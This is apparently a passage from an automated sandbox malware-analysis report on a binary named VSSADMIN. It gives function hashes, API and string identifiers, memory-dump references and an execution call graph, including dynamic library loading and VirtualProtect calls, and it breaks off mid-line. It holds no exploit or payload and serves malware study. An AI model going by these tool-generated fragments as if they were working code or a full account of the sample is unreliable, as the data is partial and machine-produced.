                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: Fatal error detected
                                                                                                                                                                      • API String ID: 1878133881-4025702859
                                                                                                                                                                      • Opcode ID: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                      • Instruction ID: a49303f06f8780b8e014b4f9c7065a12ecf7965e4abde25aa76fce8a106fb723
                                                                                                                                                                      • Opcode Fuzzy Hash: 467762ab5f403c00d0413d4f15cd763011442619e8d5336c18fe6ceaac1fee72
                                                                                                                                                                      • Instruction Fuzzy Hash: D821A67262CA8292EB20DB14F4906EA7374FF95B98F805136E64D87A65DF3DD245C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C72890 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message$ByteCharMultiWide
                                                                                                                                                                      • String ID: Error detected
                                                                                                                                                                      • API String ID: 1878133881-3513342764
                                                                                                                                                                      • Opcode ID: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
                                                                                                                                                                      • Instruction ID: e4213435244b9469cfa5219e9e3788d136793a4e1cb18b9816c5f1dd7773f744
                                                                                                                                                                      • Opcode Fuzzy Hash: 3a752796a53e4bc79ccde23300fb76c48695a964a89870303d0a97fe25c8ba30
                                                                                                                                                                      • Instruction Fuzzy Hash: BA21867262CA8292EB20D714F4916EAB374FF95B98F805136E68D87A65DF3DD205C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C7EFE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                      • String ID: csm
                                                                                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                                                                                      • Opcode ID: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
                                                                                                                                                                      • Instruction ID: fec1f0a4ab71d96dae5c7cde083ccec8d9e5605f7e08bb13d27bbcb3617339c3
                                                                                                                                                                      • Opcode Fuzzy Hash: 0a7d407d7729a8694e7779ca2a1de00754ab8488b643d7346c0eaced0571dbb1
                                                                                                                                                                      • Instruction Fuzzy Hash: A8113D32608F8182EB158F15F48026977A4FB89FA8F184235DF8D47764DF3DD5518700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8F03C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                      • String ID: :
                                                                                                                                                                      • API String ID: 2595371189-336475711
                                                                                                                                                                      • Opcode ID: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
                                                                                                                                                                      • Instruction ID: c4f82c2235458d99cb60745b9e31a72a69d7a9732c52fc391b20815b90c59dec
                                                                                                                                                                      • Opcode Fuzzy Hash: 088d6e29a3b0fed2a997de7a9fe2f09f1c5d5ef028721ffa5e057cac36b0a100
                                                                                                                                                                      • Instruction Fuzzy Hash: C1018461A1CA438AFB209F6094E127E63B0EF46B68F440137D74DC7691EF2DE545DA18
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:1%
                                                                                                                                                                      Total number of Nodes:819
                                                                                                                                                                      Total number of Limit Nodes:10
                                                                                                                                                                      execution_graph 66229 7ffd3ff45510 66230 7ffd3ff460b1 66229->66230 66237 7ffd3ff45528 66229->66237 66231 7ffd3ff45fbe LoadLibraryA 66232 7ffd3ff45fd8 66231->66232 66235 7ffd3ff45ff7 GetProcAddress 66232->66235 66232->66237 66234 7ffd3ff46019 VirtualProtect VirtualProtect 66234->66230 66235->66232 66236 7ffd3ff4600e 66235->66236 66237->66231 66237->66234 66238 7ff614c7b1cc 66263 7ff614c7b39c 66238->66263 66241 7ff614c7b318 66367 7ff614c7b6cc 7 API calls 2 library calls 66241->66367 66242 7ff614c7b1e8 __scrt_acquire_startup_lock 66244 7ff614c7b322 66242->66244 66245 7ff614c7b206 66242->66245 66368 7ff614c7b6cc 7 API calls 2 library calls 66244->66368 66255 7ff614c7b248 __scrt_release_startup_lock 66245->66255 66271 7ff614c886a4 66245->66271 66249 7ff614c7b22b 66251 7ff614c7b32d __CxxCallCatchBlock 66252 7ff614c7b2b1 66279 7ff614c7b818 66252->66279 66254 7ff614c7b2b6 66282 7ff614c71000 66254->66282 66255->66252 66364 7ff614c889b4 45 API calls 66255->66364 66260 7ff614c7b2d9 66260->66251 66366 7ff614c7b530 7 API calls __scrt_initialize_crt 66260->66366 66262 7ff614c7b2f0 66262->66249 66369 7ff614c7b99c 66263->66369 66266 7ff614c7b3cb 66371 7ff614c890bc 66266->66371 66267 7ff614c7b1e0 66267->66241 66267->66242 66273 7ff614c886b7 66271->66273 66272 7ff614c7b227 66272->66249 66275 7ff614c88660 66272->66275 66273->66272 66388 7ff614c7b0e0 66273->66388 66276 7ff614c88696 66275->66276 66277 7ff614c88665 66275->66277 66276->66255 66277->66276 66463 7ff614c7b1b0 66277->66463 66472 7ff614c7c240 66279->66472 66281 7ff614c7b82f GetStartupInfoW 66281->66254 66283 7ff614c7100b 66282->66283 66474 7ff614c77630 66283->66474 66285 7ff614c7101d 66481 7ff614c84f44 66285->66481 66287 7ff614c7369b 66488 7ff614c71af0 66287->66488 66293 7ff614c736b9 66355 7ff614c737ba 66293->66355 66504 7ff614c73b40 66293->66504 66295 7ff614c736eb 66295->66355 66507 7ff614c769b0 66295->66507 66297 7ff614c73707 66298 7ff614c769b0 61 API calls 66297->66298 66313 7ff614c73753 66297->66313 66305 7ff614c73728 __std_exception_copy 66298->66305 66300 7ff614c73768 66526 7ff614c719d0 66300->66526 66303 7ff614c7385d 66306 7ff614c73888 66303->66306 66636 7ff614c732a0 59 API calls 66303->66636 66304 7ff614c719d0 121 API calls 66307 7ff614c7379e 66304->66307 66308 7ff614c76fc0 58 API calls 66305->66308 66305->66313 66316 7ff614c738cb 66306->66316 66537 7ff614c77a60 66306->66537 66311 7ff614c737a2 66307->66311 66312 7ff614c737e0 66307->66312 66308->66313 66602 7ff614c72770 59 API calls 2 library calls 66311->66602 66312->66303 66612 7ff614c73cd0 66312->66612 66522 7ff614c76fc0 66313->66522 66314 7ff614c738a8 66317 7ff614c738ad 66314->66317 66318 7ff614c738be SetDllDirectoryW 66314->66318 66551 7ff614c75e60 66316->66551 66637 7ff614c72770 59 API calls 2 library calls 66317->66637 66318->66316 66324 7ff614c73802 66635 7ff614c72770 59 API calls 2 library calls 66324->66635 66328 7ff614c738e8 66352 7ff614c7391a 66328->66352 66639 7ff614c75660 161 API calls 3 library calls 66328->66639 66329 7ff614c73830 66329->66303 66330 7ff614c73835 66329->66330 66631 7ff614c7f2dc 66330->66631 66331 7ff614c739e6 66592 7ff614c73130 66331->66592 66335 7ff614c738f9 66338 7ff614c7391c 66335->66338 66640 7ff614c755e0 91 API calls 66335->66640 66337 7ff614c73939 66344 7ff614c73985 66337->66344 66643 7ff614c71b30 66337->66643 66642 7ff614c758b0 FreeLibrary 66338->66642 66343 7ff614c73a1b 66346 7ff614c769b0 61 API calls 66343->66346 66344->66355 66555 7ff614c730d0 66344->66555 66345 7ff614c73907 66345->66338 66348 7ff614c7390b 66345->66348 66350 7ff614c73a27 66346->66350 66641 7ff614c75cb0 60 API calls 66348->66641 66353 7ff614c73a38 66350->66353 66350->66355 66351 7ff614c739c1 66647 7ff614c758b0 FreeLibrary 66351->66647 66352->66331 66352->66337 66649 7ff614c77000 63 API calls 2 library calls 66353->66649 66603 7ff614c7adb0 66355->66603 66357 7ff614c73a50 66650 7ff614c758b0 FreeLibrary 66357->66650 66359 7ff614c73a77 66652 7ff614c71ab0 74 API calls __std_exception_copy 66359->66652 66360 7ff614c73a5c 66360->66359 66651 7ff614c76cc0 67 API calls 2 library calls 66360->66651 66363 7ff614c73a7f 66363->66355 66364->66252 66365 7ff614c7b85c GetModuleHandleW 66365->66260 66366->66262 66367->66244 66368->66251 66370 7ff614c7b3be __scrt_dllmain_crt_thread_attach 66369->66370 66370->66266 66370->66267 66372 7ff614c925fc 66371->66372 66373 7ff614c7b3d0 66372->66373 66376 7ff614c8ba20 66372->66376 66373->66267 66375 7ff614c7caf8 7 API calls 2 library calls 66373->66375 66375->66267 66387 7ff614c8f7b8 EnterCriticalSection 66376->66387 66378 7ff614c8ba30 66379 7ff614c86b74 43 API calls 66378->66379 66380 7ff614c8ba39 66379->66380 66381 7ff614c8ba47 66380->66381 66382 7ff614c8b828 45 API calls 66380->66382 66383 7ff614c8f818 _isindst LeaveCriticalSection 66381->66383 66384 7ff614c8ba42 66382->66384 66385 7ff614c8ba53 66383->66385 66386 7ff614c8b918 GetStdHandle GetFileType 66384->66386 66385->66372 66386->66381 66389 7ff614c7b0f0 66388->66389 66405 7ff614c857cc 66389->66405 66391 7ff614c7b0fc 66411 7ff614c7b3e8 66391->66411 66394 7ff614c7b195 66394->66273 66395 7ff614c7b114 _RTC_Initialize 66403 7ff614c7b169 66395->66403 66416 7ff614c7b598 66395->66416 66397 7ff614c7b129 66419 7ff614c87e9c 66397->66419 66401 7ff614c7b13e 66402 7ff614c88ab0 45 API calls 66401->66402 66402->66403 66404 7ff614c7b185 66403->66404 66445 7ff614c7b6cc 7 API calls 2 library calls 66403->66445 66404->66273 66406 7ff614c857dd 66405->66406 66407 7ff614c857e5 66406->66407 66446 7ff614c84474 11 API calls _set_fmode 66406->66446 66407->66391 66409 7ff614c857f4 66447 7ff614c89de0 37 API calls _invalid_parameter_noinfo 66409->66447 66412 7ff614c7b3f9 66411->66412 66415 7ff614c7b3fe __scrt_acquire_startup_lock 66411->66415 66412->66415 66448 7ff614c7b6cc 7 API calls 2 library calls 66412->66448 66414 7ff614c7b472 66415->66395 66449 7ff614c7b55c 66416->66449 66418 7ff614c7b5a1 66418->66397 66420 7ff614c87ebc 66419->66420 66421 7ff614c7b135 66419->66421 66422 7ff614c87eda GetModuleFileNameW 66420->66422 66423 7ff614c87ec4 66420->66423 66421->66403 66444 7ff614c7b66c InitializeSListHead 66421->66444 66427 7ff614c87f05 66422->66427 66454 7ff614c84474 11 API calls _set_fmode 66423->66454 66425 7ff614c87ec9 66455 7ff614c89de0 37 API calls _invalid_parameter_noinfo 66425->66455 66456 7ff614c87e3c 11 API calls 2 library calls 66427->66456 66429 7ff614c87f45 66430 7ff614c87f4d 66429->66430 66434 7ff614c87f65 66429->66434 66457 7ff614c84474 11 API calls _set_fmode 66430->66457 66432 7ff614c87f52 66458 7ff614c89e48 11 API calls 2 library calls 66432->66458 66437 7ff614c87fb3 66434->66437 66439 7ff614c87fcc 66434->66439 66443 7ff614c87f87 66434->66443 66435 7ff614c87f60 66435->66421 66459 7ff614c89e48 11 API calls 2 library calls 66437->66459 66439->66439 66461 7ff614c89e48 11 API calls 2 library calls 66439->66461 66440 7ff614c87fbc 66460 7ff614c89e48 11 API calls 2 library calls 66440->66460 66462 7ff614c89e48 11 API calls 2 library calls 66443->66462 66445->66394 66446->66409 66448->66414 66450 7ff614c7b576 66449->66450 66452 7ff614c7b56f 66449->66452 66453 7ff614c88f1c 40 API calls 66450->66453 66452->66418 66453->66452 66454->66425 66456->66429 66457->66432 66458->66435 66459->66440 66460->66435 66461->66443 66462->66421 66471 7ff614c7b8b0 SetUnhandledExceptionFilter 66463->66471 66473 7ff614c7c220 66472->66473 66473->66281 66473->66473 66476 7ff614c7764f 66474->66476 66475 7ff614c776a0 WideCharToMultiByte 66475->66476 66478 7ff614c77748 66475->66478 66476->66475 66477 7ff614c776f6 WideCharToMultiByte 66476->66477 66476->66478 66480 7ff614c77657 __std_exception_copy 66476->66480 66477->66476 66477->66478 66653 7ff614c72620 57 API calls 2 library calls 66478->66653 66480->66285 66482 7ff614c8ec70 66481->66482 66484 7ff614c8ed16 66482->66484 66485 7ff614c8ecc3 66482->66485 66655 7ff614c8eb48 71 API calls _fread_nolock 66484->66655 66654 7ff614c89d14 37 API calls 2 library calls 66485->66654 66487 7ff614c8ecec 66487->66287 66489 7ff614c71b05 66488->66489 66490 7ff614c71b20 66489->66490 66656 7ff614c724d0 59 API calls 3 library calls 66489->66656 66490->66355 66492 7ff614c73bc0 66490->66492 66657 7ff614c7ade0 66492->66657 66495 7ff614c73bfb 66659 7ff614c72620 57 API calls 2 library calls 66495->66659 66496 7ff614c73c12 66660 7ff614c77b70 59 API calls 66496->66660 66499 7ff614c73c0e 66502 7ff614c7adb0 _wfindfirst32i64 8 API calls 66499->66502 66500 7ff614c73c25 66500->66499 66661 7ff614c72770 59 API calls 2 library calls 66500->66661 66503 7ff614c73c4f 66502->66503 66503->66293 66505 7ff614c71b30 49 API calls 66504->66505 66506 7ff614c73b5d 66505->66506 66506->66295 66508 7ff614c769ba 66507->66508 66509 7ff614c77a60 57 API calls 66508->66509 66510 7ff614c769dc GetEnvironmentVariableW 66509->66510 66511 7ff614c76a46 66510->66511 66512 7ff614c769f4 ExpandEnvironmentStringsW 66510->66512 66513 7ff614c7adb0 _wfindfirst32i64 8 API calls 66511->66513 66662 7ff614c77b70 59 API calls 66512->66662 66515 7ff614c76a58 66513->66515 66515->66297 66516 7ff614c76a1c 66516->66511 66517 7ff614c76a26 66516->66517 66663 7ff614c8913c 37 API calls 2 library calls 66517->66663 66519 7ff614c76a2e 66520 7ff614c7adb0 _wfindfirst32i64 8 API calls 66519->66520 66521 7ff614c76a3e 66520->66521 66521->66297 66523 7ff614c77a60 57 API calls 66522->66523 66524 7ff614c76fd7 SetEnvironmentVariableW 66523->66524 66525 7ff614c76fef __std_exception_copy 66524->66525 66525->66300 66527 7ff614c71b30 49 API calls 66526->66527 66528 7ff614c71a00 66527->66528 66529 7ff614c71b30 49 API calls 66528->66529 66535 7ff614c71a7a 66528->66535 66530 7ff614c71a22 66529->66530 66531 7ff614c73b40 49 API calls 66530->66531 66530->66535 66532 7ff614c71a3b 66531->66532 66664 7ff614c717b0 66532->66664 66535->66303 66535->66304 66536 7ff614c7f2dc 74 API calls 66536->66535 66538 7ff614c77b07 MultiByteToWideChar 66537->66538 66539 7ff614c77a81 MultiByteToWideChar 66537->66539 66540 7ff614c77b2a 66538->66540 66541 7ff614c77b4f 66538->66541 66542 7ff614c77acc 66539->66542 66543 7ff614c77aa7 66539->66543 66749 7ff614c72620 57 API calls 2 library calls 66540->66749 66541->66314 66542->66538 66548 7ff614c77ae2 66542->66548 66747 7ff614c72620 57 API calls 2 library calls 66543->66747 66546 7ff614c77b3d 66546->66314 66547 7ff614c77aba 66547->66314 66748 7ff614c72620 57 API calls 2 library calls 66548->66748 66550 7ff614c77af5 66550->66314 66552 7ff614c75e75 66551->66552 66553 7ff614c738d0 66552->66553 66750 7ff614c724d0 59 API calls 3 library calls 66552->66750 66553->66352 66638 7ff614c75b00 122 API calls 2 library calls 66553->66638 66751 7ff614c74980 66555->66751 66558 7ff614c7311d 66558->66351 66560 7ff614c730f4 66560->66558 66807 7ff614c74700 66560->66807 66562 7ff614c73100 66562->66558 66817 7ff614c74860 66562->66817 66564 7ff614c7310c 66564->66558 66565 7ff614c7335c 66564->66565 66566 7ff614c73347 66564->66566 66568 7ff614c7337c 66565->66568 66579 7ff614c73392 __std_exception_copy 66565->66579 66848 7ff614c72770 59 API calls 2 library calls 66566->66848 66849 7ff614c72770 59 API calls 2 library calls 66568->66849 66569 7ff614c7adb0 _wfindfirst32i64 8 API calls 66571 7ff614c734ea 66569->66571 66571->66351 66574 7ff614c71b30 49 API calls 66574->66579 66575 7ff614c7362b 66857 7ff614c72770 59 API calls 2 library calls 66575->66857 66577 7ff614c73605 66856 7ff614c72770 59 API calls 2 library calls 66577->66856 66579->66574 66579->66575 66579->66577 66580 7ff614c734f6 66579->66580 66591 7ff614c73353 __std_exception_copy 66579->66591 66822 7ff614c712b0 66579->66822 66850 7ff614c71780 59 API calls 66579->66850 66581 7ff614c73562 66580->66581 66851 7ff614c8913c 37 API calls 2 library calls 66580->66851 66852 7ff614c716d0 59 API calls 66581->66852 66584 7ff614c73584 66585 7ff614c73589 66584->66585 66586 7ff614c73597 66584->66586 66853 7ff614c8913c 37 API calls 2 library calls 66585->66853 66854 7ff614c72ec0 37 API calls 66586->66854 66589 7ff614c73595 66855 7ff614c723b0 62 API calls __std_exception_copy 66589->66855 66591->66569 66594 7ff614c731e4 66592->66594 66599 7ff614c731a3 66592->66599 66593 7ff614c73223 66596 7ff614c7adb0 _wfindfirst32i64 8 API calls 66593->66596 66594->66593 67029 7ff614c71ab0 74 API calls __std_exception_copy 66594->67029 66597 7ff614c73235 66596->66597 66597->66355 66648 7ff614c76f50 57 API calls __std_exception_copy 66597->66648 66599->66594 66973 7ff614c729b0 66599->66973 67028 7ff614c71440 161 API calls 2 library calls 66599->67028 67030 7ff614c71780 59 API calls 66599->67030 66602->66355 66604 7ff614c7adb9 66603->66604 66605 7ff614c737ce 66604->66605 66606 7ff614c7ae70 IsProcessorFeaturePresent 66604->66606 66605->66365 66607 7ff614c7ae88 66606->66607 67128 7ff614c7b064 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 66607->67128 66609 7ff614c7ae9b 67129 7ff614c7ae30 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 66609->67129 66613 7ff614c73cdc 66612->66613 66614 7ff614c77a60 57 API calls 66613->66614 66615 7ff614c73d07 66614->66615 66616 7ff614c77a60 57 API calls 66615->66616 66617 7ff614c73d1a 66616->66617 67130 7ff614c854f8 66617->67130 66620 7ff614c7adb0 _wfindfirst32i64 8 API calls 66621 7ff614c737fa 66620->66621 66621->66324 66622 7ff614c77230 66621->66622 66623 7ff614c77254 66622->66623 66624 7ff614c7f964 73 API calls 66623->66624 66629 7ff614c7732b __std_exception_copy 66623->66629 66625 7ff614c7726e 66624->66625 66625->66629 67298 7ff614c87968 66625->67298 66627 7ff614c7f964 73 API calls 66630 7ff614c77283 66627->66630 66628 7ff614c7f62c _fread_nolock 53 API calls 66628->66630 66629->66329 66630->66627 66630->66628 66630->66629 66632 7ff614c7f30c 66631->66632 67314 7ff614c7f0b8 66632->67314 66634 7ff614c7f325 66634->66324 66635->66355 66636->66306 66637->66355 66638->66328 66639->66335 66640->66345 66641->66352 66642->66352 66644 7ff614c71b55 66643->66644 66645 7ff614c83c14 49 API calls 66644->66645 66646 7ff614c71b78 66645->66646 66646->66344 66647->66355 66648->66343 66649->66357 66650->66360 66651->66359 66652->66363 66653->66480 66654->66487 66655->66487 66656->66490 66658 7ff614c73bcc GetModuleFileNameW 66657->66658 66658->66495 66658->66496 66659->66499 66660->66500 66661->66499 66662->66516 66663->66519 66665 7ff614c717d4 66664->66665 66666 7ff614c717e4 66664->66666 66667 7ff614c73cd0 116 API calls 66665->66667 66668 7ff614c77230 83 API calls 66666->66668 66694 7ff614c71842 66666->66694 66667->66666 66669 7ff614c71815 66668->66669 66669->66694 66698 7ff614c7f964 66669->66698 66671 7ff614c7adb0 _wfindfirst32i64 8 API calls 66673 7ff614c719c0 66671->66673 66672 7ff614c7182b 66674 7ff614c7184c 66672->66674 66675 7ff614c7182f 66672->66675 66673->66535 66673->66536 66702 7ff614c7f62c 66674->66702 66711 7ff614c724d0 59 API calls 3 library calls 66675->66711 66679 7ff614c71867 66712 7ff614c724d0 59 API calls 3 library calls 66679->66712 66680 7ff614c7f964 73 API calls 66682 7ff614c718d1 66680->66682 66683 7ff614c718e3 66682->66683 66684 7ff614c718fe 66682->66684 66713 7ff614c724d0 59 API calls 3 library calls 66683->66713 66685 7ff614c7f62c _fread_nolock 53 API calls 66684->66685 66687 7ff614c71913 66685->66687 66687->66679 66688 7ff614c71925 66687->66688 66705 7ff614c7f3a0 66688->66705 66691 7ff614c7193d 66714 7ff614c72770 59 API calls 2 library calls 66691->66714 66693 7ff614c71993 66693->66694 66695 7ff614c7f2dc 74 API calls 66693->66695 66694->66671 66695->66694 66696 7ff614c71950 66696->66693 66715 7ff614c72770 59 API calls 2 library calls 66696->66715 66699 7ff614c7f994 66698->66699 66716 7ff614c7f6f4 66699->66716 66701 7ff614c7f9ad 66701->66672 66729 7ff614c7f64c 66702->66729 66706 7ff614c71939 66705->66706 66707 7ff614c7f3a9 66705->66707 66706->66691 66706->66696 66745 7ff614c84474 11 API calls _set_fmode 66707->66745 66709 7ff614c7f3ae 66746 7ff614c89de0 37 API calls _invalid_parameter_noinfo 66709->66746 66711->66694 66712->66694 66713->66694 66714->66694 66715->66693 66717 7ff614c7f75e 66716->66717 66718 7ff614c7f71e 66716->66718 66717->66718 66720 7ff614c7f76a 66717->66720 66728 7ff614c89d14 37 API calls 2 library calls 66718->66728 66727 7ff614c8431c EnterCriticalSection 66720->66727 66721 7ff614c7f745 66721->66701 66723 7ff614c7f76f 66724 7ff614c7f878 71 API calls 66723->66724 66725 7ff614c7f781 66724->66725 66726 7ff614c84328 _fread_nolock LeaveCriticalSection 66725->66726 66726->66721 66728->66721 66730 7ff614c7f676 66729->66730 66731 7ff614c71861 66729->66731 66730->66731 66732 7ff614c7f685 __scrt_get_show_window_mode 66730->66732 66733 7ff614c7f6c2 66730->66733 66731->66679 66731->66680 66743 7ff614c84474 11 API calls _set_fmode 66732->66743 66742 7ff614c8431c EnterCriticalSection 66733->66742 66735 7ff614c7f6ca 66737 7ff614c7f3cc _fread_nolock 51 API calls 66735->66737 66739 7ff614c7f6e1 66737->66739 66738 7ff614c7f69a 66744 7ff614c89de0 37 API calls _invalid_parameter_noinfo 66738->66744 66741 7ff614c84328 _fread_nolock LeaveCriticalSection 66739->66741 66741->66731 66743->66738 66745->66709 66747->66547 66748->66550 66749->66546 66750->66553 66752 7ff614c74990 66751->66752 66753 7ff614c71b30 49 API calls 66752->66753 66754 7ff614c749c2 66753->66754 66755 7ff614c749eb 66754->66755 66756 7ff614c749cb 66754->66756 66758 7ff614c74a42 66755->66758 66858 7ff614c73d50 66755->66858 66871 7ff614c72770 59 API calls 2 library calls 66756->66871 66759 7ff614c73d50 49 API calls 66758->66759 66762 7ff614c74a5b 66759->66762 66760 7ff614c749e1 66764 7ff614c7adb0 _wfindfirst32i64 8 API calls 66760->66764 66765 7ff614c74a79 66762->66765 66873 7ff614c72770 59 API calls 2 library calls 66762->66873 66763 7ff614c74a0c 66766 7ff614c74a2a 66763->66766 66872 7ff614c72770 59 API calls 2 library calls 66763->66872 66767 7ff614c730de 66764->66767 66867 7ff614c771e0 66765->66867 66861 7ff614c73c60 66766->66861 66767->66558 66779 7ff614c74d00 66767->66779 66772 7ff614c74a86 66774 7ff614c74aad 66772->66774 66775 7ff614c74a8b 66772->66775 66875 7ff614c73e10 112 API calls 66774->66875 66874 7ff614c72620 57 API calls 2 library calls 66775->66874 66776 7ff614c771e0 58 API calls 66776->66758 66780 7ff614c769b0 61 API calls 66779->66780 66782 7ff614c74d15 66780->66782 66781 7ff614c74d30 66783 7ff614c77a60 57 API calls 66781->66783 66782->66781 66903 7ff614c72890 59 API calls 2 library calls 66782->66903 66785 7ff614c74d74 66783->66785 66786 7ff614c74d79 66785->66786 66787 7ff614c74d90 66785->66787 66904 7ff614c72770 59 API calls 2 library calls 66786->66904 66790 7ff614c77a60 57 API calls 66787->66790 66789 7ff614c74d85 66789->66560 66791 7ff614c74dc5 66790->66791 66793 7ff614c71b30 49 API calls 66791->66793 66805 7ff614c74dca __std_exception_copy 66791->66805 66795 7ff614c74e47 66793->66795 66794 7ff614c74f71 66794->66560 66796 7ff614c74e73 66795->66796 66797 7ff614c74e4e 66795->66797 66799 7ff614c77a60 57 API calls 66796->66799 66905 7ff614c72770 59 API calls 2 library calls 66797->66905 66801 7ff614c74e8c 66799->66801 66800 7ff614c74e63 66800->66560 66801->66805 66876 7ff614c74ae0 66801->66876 66806 7ff614c74f5a 66805->66806 66907 7ff614c72770 59 API calls 2 library calls 66805->66907 66806->66560 66808 7ff614c74717 66807->66808 66808->66808 66809 7ff614c74740 66808->66809 66816 7ff614c74757 __std_exception_copy 66808->66816 66923 7ff614c72770 59 API calls 2 library calls 66809->66923 66811 7ff614c7474c 66811->66562 66812 7ff614c7483b 66812->66562 66813 7ff614c712b0 122 API calls 66813->66816 66816->66812 66816->66813 66924 7ff614c72770 59 API calls 2 library calls 66816->66924 66925 7ff614c71780 59 API calls 66816->66925 66818 7ff614c74967 66817->66818 66820 7ff614c7487b 66817->66820 66818->66564 66820->66818 66821 7ff614c72770 59 API calls 66820->66821 66926 7ff614c71780 59 API calls 66820->66926 66821->66820 66823 7ff614c712f8 66822->66823 66824 7ff614c712c6 66822->66824 66825 7ff614c7f964 73 API calls 66823->66825 66826 7ff614c73cd0 116 API calls 66824->66826 66827 7ff614c7130a 66825->66827 66828 7ff614c712d6 66826->66828 66829 7ff614c7130e 66827->66829 66830 7ff614c7132f 66827->66830 66828->66823 66831 7ff614c712de 66828->66831 66946 7ff614c724d0 59 API calls 3 library calls 66829->66946 66836 7ff614c71364 66830->66836 66837 7ff614c71344 66830->66837 66945 7ff614c72770 59 API calls 2 library calls 66831->66945 66834 7ff614c71325 66834->66579 66835 7ff614c712ee 66835->66579 66839 7ff614c71395 66836->66839 66840 7ff614c7137e 66836->66840 66947 7ff614c724d0 59 API calls 3 library calls 66837->66947 66841 7ff614c7135f __std_exception_copy 66839->66841 66843 7ff614c7f62c _fread_nolock 53 API calls 66839->66843 66846 7ff614c713de 66839->66846 66927 7ff614c71050 66840->66927 66844 7ff614c7f2dc 74 API calls 66841->66844 66845 7ff614c71421 66841->66845 66843->66839 66844->66845 66845->66579 66948 7ff614c724d0 59 API 